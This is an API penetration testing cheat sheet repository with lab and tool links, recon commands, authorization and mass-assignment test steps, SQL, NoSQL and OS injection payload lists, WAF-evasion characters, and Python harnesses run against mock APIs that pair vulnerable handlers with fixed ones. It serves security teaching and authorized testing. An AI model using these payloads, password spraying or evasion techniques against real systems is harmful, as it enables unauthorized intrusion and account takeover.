├── Intro.md
├── LICENSE
├── Learning.md
└── README.md

--------------------------------------------------------------------------------
/Intro.md:
--------------------------------------------------------------------------------

- [What is an API](https://aws.amazon.com/what-is/api/)
- [OWASP API Security Top 10 (2023)](https://owasp.org/API-Security/editions/2023/en/0x00-header/)

--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2023 Aftab Sama

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/Learning.md:
--------------------------------------------------------------------------------
## Tools

- https://github.com/ticarpi/jwt_tool (JWT testing and attack automation)
- https://github.com/assetnote/kiterunner (API endpoint discovery with route wordlists)
- https://github.com/s0md3v/Arjun (hidden HTTP parameter discovery)
- https://github.com/danielmiessler/SecLists (wordlists)
- https://github.com/hAPI-hacker/Hacking-APIs (companion repository for the Hacking APIs book)

## Your API Hacking Lab

### Hosted lab
APIsec.ai hosts deliberately vulnerable APIs that you can use to practice your skills:
- crAPI: http://crapi.apisec.ai/
- vAPI: http://vapi.apisec.ai/

### Set up your own lab
- https://github.com/OWASP/crAPI
- https://github.com/roottusk/vapi

## Additional Resources

- [The Web Security Academy](https://portswigger.net/web-security): one of the best free online web security training courses on the Internet.
- [APIsecurity.io](https://apisecurity.io/): a weekly newsletter covering the latest API security news.
- [API Hacking Mind Map](https://dsopas.github.io/MindAPI/) by David Sopas.
- Get involved in the bug bounty communities:
  - [Synack](https://www.synack.com/)
  - [BugCrowd](https://www.bugcrowd.com/bug-bounty-list/)
  - [HackerOne](https://www.hackerone.com/)
  - [Intigriti](https://www.intigriti.com/)
- [Insider PhD Everything API Hacking](https://www.youtube.com/playlist?list=PLbyncTkpno5HqX1h2MnV6Qt4wvTb8Mpol): Katie Paxton-Fear's playlist of API hacking videos.
- [Awesome API Security](https://github.com/arainho/awesome-api-security): a curated list of API security resources.

### Courses
- https://university.apisec.ai/

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# API-Penetration-Testing

## Web API Indicators

Look out for obvious URL naming schemes:

- https://target-name.com/api/v1
- https://api.target-name.com/v1
- https://target-name.com/docs
- https://dev.target-name.com/rest

Look for API indicators within directory names, such as:

/api, /api/v1, /v1, /v2, /v3, /rest, /swagger, /swagger.json, /doc, /docs, /graphql, /graphiql, /altair, /playground

Subdomains can also indicate web APIs:
- api.target-name.com
- uat.target-name.com
- dev.target-name.com
- developer.target-name.com
- test.target-name.com

TruffleHog is a great tool for automatically discovering exposed secrets (API keys, tokens) in repositories and other sources:
- https://github.com/trufflesecurity/trufflehog

## Active API Reconnaissance

- Service and HTTP enumeration (`target-name.com` is a placeholder for the target): `nmap -sV --script=http-enum -p 80,443,8000,8080 target-name.com`
- Subdomain enumeration, filtered for API-looking names: `amass enum -active -d target-name.com | grep api`
- Directory brute force with an API-specific wordlist (gobuster needs the scheme in the URL):
  - `gobuster dir -u http://target-name.com:8000 -w /home/hapihacker/api/wordlists/common_apis_160`
- Kiterunner for discovering API endpoints and resources:
  - https://github.com/assetnote/kiterunner
  - `kr scan http://127.0.0.1 -w ~/api/wordlists/data/kiterunner/routes-large.kite`

## Authentication Attacks

Brute-force attacks:
- Create targeted password lists with tools such as:
  - https://github.com/sc0tfree/mentalist
  - https://github.com/Mebus/cupp

Password spraying:
- Combine a long list of users with a short list of likely passwords, so that no single account reaches a lockout threshold.

## JWT Attacks

jwt.io is a free web-based JWT decoder and debugger:
- https://jwt.io/

Automate JWT attacks (e.g. alg:none, weak HMAC secret cracking, claim tampering) with jwt_tool:
- https://github.com/ticarpi/jwt_tool/wiki

## Exploiting API Authorization

- Find resource IDs and the requests that use them.

#### Authorization Testing Strategy:
1. Create a UserA account.
2. Use the API as UserA and discover requests that involve resource IDs.
3. Document the requests that include resource IDs and should require authorization.
4. Create a UserB account.
5. Obtain a valid UserB token and attempt to access UserA's resources with it.

- If a request is denied, also try changing the request method (e.g. GET to PUT or DELETE): authorization checks are sometimes applied per method rather than per resource.

## Improper Assets Management
> Testing for Improper Assets Management (renamed Improper Inventory Management in the 2023 OWASP API Security Top 10) is all about discovering unsupported and non-production versions of an API.

- Non-production versions of an API include any version that was not meant for end-user consumption, for example:
  - api.test.target.com
  - api.uat.target.com
  - beta.api.com
  - /api/private
  - /api/partner
  - /api/test
- Check the path, parameters, and headers for any versioning information; older versions often lack the fixes applied to the current one.

## Mass Assignment Attacks
> Mass assignment vulnerabilities are present when an attacker is able to overwrite object properties that they should not be able to.

One way to discover mass assignment vulnerabilities is to find interesting parameters in the API documentation and then add those parameters to requests. Look for parameters involved in user account properties, critical functions, and administrative actions.
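The two black-box checks above, the UserA/UserB authorization strategy (including the method switch) and the mass-assignment test of adding privilege parameters to a request, scripted as one harness. This is an added example, not code from the original page or from any tool it links: the target is a constructed in-process mock API with one route that never checks ownership (`/api/v1/orders/<id>`), one that does (`/api/v1/users/<id>`), and a registration handler that copies every JSON key into the new account. The tokens, paths and candidate keys are assumptions; point `check_bola()` and `check_mass_assignment()` at a real base URL and real tokens instead.

```python
"""Added example: BOLA and mass-assignment checks against a constructed mock API.
Not code from the original page; routes, tokens and fixtures are assumptions."""
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib import error, request

TOKENS = {"token-userA": "A", "token-userB": "B"}                  # bearer token -> user
ORDERS = {"1001": {"owner": "A", "item": "laptop"}, "2002": {"owner": "B", "item": "phone"}}
PROFILES = {"A": {"email": "a@example.com"}, "B": {"email": "b@example.com"}}
CANDIDATES = [("isadmin", True), ("isadmin", "true"), ("admin", 1), ("admin", True)]


class MockAPI(BaseHTTPRequestHandler):
    def _send(self, code, body):
        self.send_response(code)
        self.send_header("Content-Type", "application/json")
        self.end_headers()
        self.wfile.write(json.dumps(body).encode())

    def do_GET(self):
        user = TOKENS.get(self.headers.get("Authorization", "").removeprefix("Bearer "))
        if user is None:
            return self._send(401, {"error": "unauthenticated"})
        parts = self.path.strip("/").split("/")
        if parts[:3] == ["api", "v1", "orders"] and len(parts) == 4:
            order = ORDERS.get(parts[3])            # BUG (intentional): owner never compared to user
            return self._send(200, order) if order else self._send(404, {})
        if parts[:3] == ["api", "v1", "users"] and len(parts) == 4:
            if parts[3] != user:                    # correct: a caller reads only their own profile
                return self._send(403, {"error": "forbidden"})
            return self._send(200, PROFILES[user])
        self._send(404, {})

    def do_POST(self):
        if self.path != "/api/v1/register":
            return self._send(404, {})
        body = json.loads(self.rfile.read(int(self.headers.get("Content-Length", 0))))
        account = {"username": None, "email": None, "isadmin": False, "admin": 0}
        account.update(body)                        # BUG (intentional): mass assignment
        account.pop("password", None)
        self._send(201, account)

    def log_message(self, *_):                      # keep the server quiet
        pass


def call(base, method, path, token=None, body=None):
    """One request; returns (status, parsed JSON body or None)."""
    headers = {"Content-Type": "application/json"}
    if token:
        headers["Authorization"] = f"Bearer {token}"
    data = json.dumps(body).encode() if body is not None else None
    req = request.Request(base + path, data=data, method=method, headers=headers)
    try:
        with request.urlopen(req, timeout=5) as resp:
            return resp.status, json.loads(resp.read() or b"null")
    except error.HTTPError as exc:
        return exc.code, None


def check_bola(base, documented, token_b, extra_methods=("PUT", "DELETE")):
    """Step 5: replay UserA's documented requests with UserB's token, also switching
    the method. Returns the (method, path) pairs that answered 2xx."""
    findings = []
    for method, path in documented:
        for m in dict.fromkeys((method, *extra_methods)):
            status, _ = call(base, m, path, token=token_b)
            if 200 <= status < 300:
                findings.append((m, path))
    return findings


def check_mass_assignment(base, register_body):
    """Add each candidate key to a normal registration and compare the created
    object with the baseline. Returns (key, sent_value, stored_value) for each hit."""
    _, baseline = call(base, "POST", "/api/v1/register", body=register_body)
    hits = []
    for key, value in CANDIDATES:
        status, created = call(base, "POST", "/api/v1/register", body={**register_body, key: value})
        if status == 201 and created.get(key) != baseline.get(key):
            hits.append((key, value, created[key]))
    return hits


def run_demo():
    """Start the mock on an ephemeral port, run both checks, and return their findings."""
    srv = HTTPServer(("127.0.0.1", 0), MockAPI)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    base = f"http://127.0.0.1:{srv.server_port}"
    try:
        documented = [("GET", "/api/v1/orders/1001"), ("GET", "/api/v1/users/A")]  # seen as UserA
        return (check_bola(base, documented, token_b="token-userB"),
                check_mass_assignment(base, {"username": "mallory", "email": "m@example.com",
                                             "password": "Passw0rd!"}))
    finally:
        srv.shutdown()
        srv.server_close()
```

`run_demo()` returns `[('GET', '/api/v1/orders/1001')]` for the BOLA check (the profile route correctly answers 403, and the PUT/DELETE variants are refused) and four hits for mass assignment, one per candidate key/value that came back in the created account. Against a real API, compare the created object or a follow-up GET rather than trusting the registration response alone.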

Testing account registration for mass assignment:
- Try adding other key-values to the JSON POST body, such as:
```
"isadmin": true,
"isadmin":"true",
"admin": 1,
"admin": true,
```
- Compare the response (and the account it creates) with a normal registration: a property you supplied that comes back in the response, or takes effect later, means the endpoint assigned it.

- Fuzzing for mass assignment with Param Miner (Burp Suite extension):
  - Right-click on a request that you would like to mine for parameters. Select Extensions > Param Miner > Guess params > Guess JSON parameter.

#### Free request catchers (to observe requests the target makes to a URL you control):

- http://webhook.site/
- http://pingb.in/
- https://requestbin.com/
- https://canarytokens.org/

## Injection Attacks

If the API expects a certain type of input (number, string, boolean value), send:
- A very large number
- A very large string
- A negative number
- A string (instead of a number or boolean value)
- Random characters
- Boolean values
- Metacharacters

Watch for verbose error messages, changes in response time, and differences in response length or status code: these are the signals that the input reached an interpreter.

#### SQL Injection Metacharacters

- SQL metacharacters that can break query syntax or change its logic:
```sql
'
''
;%00
--
-- -
""
;
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
OR 1=1
```

#### NoSQL Injection

The following are common NoSQL (MongoDB) operators and operator documents you can send in an API request to manipulate the query:
```
$gt
{"$gt":""}
{"$gt":-1}
$ne
{"$ne":""}
{"$ne":-1}
$nin
{"$nin":1}
{"$nin":[1]}
{"$where": "sleep(1000)"}
```

$gt is the MongoDB "greater than" query operator; {"$gt": ""} matches any non-empty string, which is why it works against password fields.

$ne selects documents where the field is not equal to the provided value, so {"$ne": ""} matches every document whose field is non-empty.

$nin is the "not in" operator, used to select documents where the field value is not within the specified array. MongoDB rejects a non-array argument such as {"$nin": 1} with an error, and that error is itself an indicator that the operator reached the database.

$where evaluates JavaScript on the server, so a sleep() call turns it into a time-based probe. Operators only take effect if the API passes the parsed JSON value into the query; an API that casts the value to a string first treats them as literal text.
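The SQL metacharacter list above, exercised against a login query. This is an added example, not code from the original page: the user table is a constructed in-memory SQLite fixture, `authenticate_vulnerable` concatenates the password into the statement (the defect under test) and `authenticate_safe` binds parameters. `probe()` reports each payload whose outcome differs from a plain wrong password, since both a database error and an unexpected login are injection indicators. Only the payloads that fit a single-quoted string context fire here; the double-quote variants are on the page for back ends that quote differently.

```python
"""Added example: SQL injection probe against a constructed SQLite login query."""
import sqlite3

# Payloads from the page's list; a plain wrong password is the baseline.
PAYLOADS = ["'", "''", "-- -", "' OR '1", "' OR 1 -- -", '" OR "" = "', "' OR '' = '", "OR 1=1"]


def make_db():
    """Constructed fixture: one user row in an in-memory database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return con


def authenticate_vulnerable(con, username, password):
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")            # BUG: string concatenation
    try:
        row = con.execute(sql).fetchone()
    except sqlite3.Error as exc:                             # syntax error leaks to the caller
        return ("error", str(exc))
    return ("ok", row[0]) if row else ("denied", None)


def authenticate_safe(con, username, password):
    row = con.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                      (username, password)).fetchone()      # bound parameters: input stays data
    return ("ok", row[0]) if row else ("denied", None)


def probe(auth, con, username="alice"):
    """Map each payload to its outcome ('ok' or 'error') when it differs from the baseline."""
    baseline = auth(con, username, "wrong-password")
    results = {}
    for payload in PAYLOADS:
        outcome = auth(con, username, payload)
        if outcome != baseline:
            results[payload] = outcome[0]
    return results
```

`probe(authenticate_vulnerable, make_db())` returns three `ok` entries (`' OR '1`, `' OR 1 -- -`, `' OR '' = '`) and one `error` (the lone `'`); `probe(authenticate_safe, make_db())` returns an empty dict. Note that `''` is absent from the vulnerable result: it is the escaped form of a quote, so it is a valid literal and simply fails as a wrong password, which is why pairing it with the single `'` tells you the input is being spliced into a quoted SQL string.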
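The NoSQL operator documents above, run through a login handler. This is an added example, not code from the original page: `find_one` is a constructed in-memory matcher that evaluates `$gt`, `$ne` and `$nin` on a field the way MongoDB does (comparisons only within the same type, `$nin` requires an array) so the block runs without a database; `$where` is not modelled. `login_vulnerable` passes the parsed JSON body straight into the query filter, `login_hardened` accepts only string credentials. The user records are a constructed fixture.

```python
"""Added example: NoSQL operator injection against a constructed Mongo-style matcher."""
import json

USERS = [  # constructed fixture
    {"username": "alice", "password": "s3cret", "role": "user"},
    {"username": "admin", "password": "hunter2!", "role": "admin"},
]


def _match(value, cond):
    """One field condition: a literal equality, or an operator document."""
    if not isinstance(cond, dict):
        return value == cond
    for op, arg in cond.items():
        if op == "$gt":
            ok = type(value) is type(arg) and value > arg   # no cross-type comparison, as in MongoDB
        elif op == "$ne":
            ok = value != arg
        elif op == "$nin":
            if not isinstance(arg, list):
                raise ValueError("$nin needs an array")     # MongoDB raises the same kind of error
            ok = value not in arg
        else:
            raise ValueError(f"unsupported operator {op}")
        if not ok:
            return False
    return True


def find_one(collection, query):
    """Return the first document for which every field condition in query holds."""
    for doc in collection:
        if all(_match(doc.get(field), cond) for field, cond in query.items()):
            return doc
    return None


def login_vulnerable(body):
    creds = json.loads(body)
    doc = find_one(USERS, {"username": creds["username"], "password": creds["password"]})  # BUG
    return doc["role"] if doc else None


def login_hardened(body):
    creds = json.loads(body)
    user, pw = creds.get("username"), creds.get("password")
    if not (isinstance(user, str) and isinstance(pw, str)):
        return None            # operator documents and other non-string types are rejected
    doc = find_one(USERS, {"username": user, "password": pw})
    return doc["role"] if doc else None
```

`login_vulnerable('{"username": "admin", "password": {"$ne": ""}}')` returns `"admin"` without a password, and `{"$nin": [""]}` / `{"$gt": ""}` on both fields logs in as the first user in the collection. `{"$gt": -1}` against a string field matches nothing, which is the type caveat above in action, and a scalar `$nin` argument raises. The hardened handler returns `None` for every operator document and still authenticates real credentials.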

#### OS Injection

The following characters either separate commands (`|`, `||`, `&`, `&&`, `;`), which lets one input string chain a second command onto the same line, or terminate a quoted argument (`'`, `"`) so that a separator placed after them is parsed by the shell instead of being treated as data:

```shell
|
||
&
&&
'
"
;
'"
```

#### Injection Targets

Requests that include user input, for example:
- PUT videos by id
- GET videos by id
- POST change-email
- POST verify-email-token
- POST login
- GET location
- POST check-otp
- POST posts
- POST validate-coupon
- POST orders

#### WAF Evasion

String terminators and other special characters (null bytes, whitespace and control characters, encoded brackets) can be placed in different parts of the request, such as the path or POST body, to attempt to bypass any restrictions in place:
```
%00
0x00
//
;
%
!
?
[]
%5B%5D
%09
%0a
%0b
%0c
%0e
```

- **Case Switching**:
  - Sometimes API security controls are pretty easy to beat. If a security control is built around the literal spelling and case of the components within a request (for example `/api/admin` versus `/api/ADMIN`, or `SELECT` versus `sElEcT`), then case switching can be an effective technique to bypass the controls.
- **Encoding Payloads**:
  - URL-encode (or double-encode) the characters a WAF inspects; if the backend decodes them but the WAF does not, the payload passes through.

Known WAF bypasses are collected in the Awesome-WAF GitHub repo:

https://github.com/0xInfection/Awesome-WAF#known-bypasses
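The separator and quote characters from the OS Injection section above, probed against two vulnerable command patterns and one safe one. This is an added example, not code from the original page: both vulnerable functions interpolate a hostname into a shell command string (one bare, one inside single quotes) and `echo` stands in for whatever utility a real API would call, so the block runs anywhere with `/bin/sh`; `lookup_safe` passes the value as a single argv entry, so nothing is parsed by a shell. The injected command prints `INJ` only when it actually executes (as literal text it reads `inj ... A-Z`), which keeps the probe free of false positives.

```python
"""Added example: command injection probe with the page's separator and quote characters."""
import subprocess

SEPARATORS = [";", "|", "||", "&", "&&"]
INJECT = "echo inj | tr a-z A-Z"           # yields INJ only when run as a command
MARKER = "INJ"
PAYLOADS = [f"127.0.0.1 {sep} {INJECT}" for sep in SEPARATORS] + [
    f"127.0.0.1'; {INJECT}; echo '",      # terminate a single-quoted argument, then chain
    f'127.0.0.1"; {INJECT}; echo "',      # terminate a double-quoted argument, then chain
]


def _sh(cmd):
    """Run a command string through /bin/sh and return its stdout."""
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def lookup_unquoted(host):
    return _sh(f"echo {host}")             # BUG: bare interpolation, any separator works


def lookup_quoted(host):
    return _sh(f"echo '{host}'")           # BUG: quoting only moves the problem to the quote char


def lookup_safe(host):
    return subprocess.run(["echo", host], capture_output=True, text=True).stdout  # argv, no shell


def probe(fn):
    """Return the payloads whose injected command actually ran under fn."""
    return [p for p in PAYLOADS if MARKER in fn(p)]
```

`probe(lookup_unquoted)` returns the `;`, `|`, `&` and `&&` payloads (`||` does not fire because `echo` succeeds, so the right-hand side is skipped); `probe(lookup_quoted)` returns only the single-quote breakout, which is why the quote characters belong in the list alongside the separators; `probe(lookup_safe)` returns nothing.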

--------------------------------------------------------------------------------